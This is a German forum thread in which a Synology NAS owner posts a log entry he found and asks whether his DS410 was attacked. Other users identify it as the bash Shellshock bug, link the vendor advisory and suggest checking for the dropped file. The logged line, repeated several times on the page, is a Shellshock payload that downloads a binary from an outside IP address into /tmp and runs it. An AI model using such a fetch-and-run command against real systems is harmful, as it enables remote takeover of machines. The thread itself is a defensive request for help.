() { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /t

steffen1707 · 13. Nov 2014

Hallo,

ich habe folgendes auf meiner DS410 im Log gefunden ....
Ich bin kein Linux Spezialist, aber wget ist mir schon geläufig...

was ist hier passiert ?
Die Sicherheitslücke scheint ja bekannt und mit dem letzten Update behoben zu sein.
Der "Angriff" erfolgte jedoch vor 2 Wochen.. muss ich mir sorgen machen ?

() { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /tmp/syslogd;

Vielen Dank schon mal vorab für eure Hilfe !
Steffen

Anzeige · 13. Nov 2014

Hallo steffen1707,

Bücher und Hardware zum Thema gibt es bei Amazon: () { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /t

jahlives · 13. Nov 2014

https://www.synology.com/en-global/support/security/bash_shellshock
Dein Modell scheint nicht betroffen zu sein

dil88 · 13. Nov 2014

Schau Dir einmal an, ob es ein /tmp/syslogd bei Dir gibt und vor allem, ob /tmp/syslogd in der Prozessliste auftaucht (nicht der normale syslogd).

Edit: Siehe Beitrag von jahlives, kannst meinen Beitrag ignorieren. Das ist die bash-Geschichte. Da die bash nur auf Atom-Modellen zum DSM gehört, wurde auch nur dort gepatcht.

Suche

() { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /t

steffen1707

Benutzer

Anzeige

jahlives

Benutzer

dil88

Benutzer

Kaffeautomat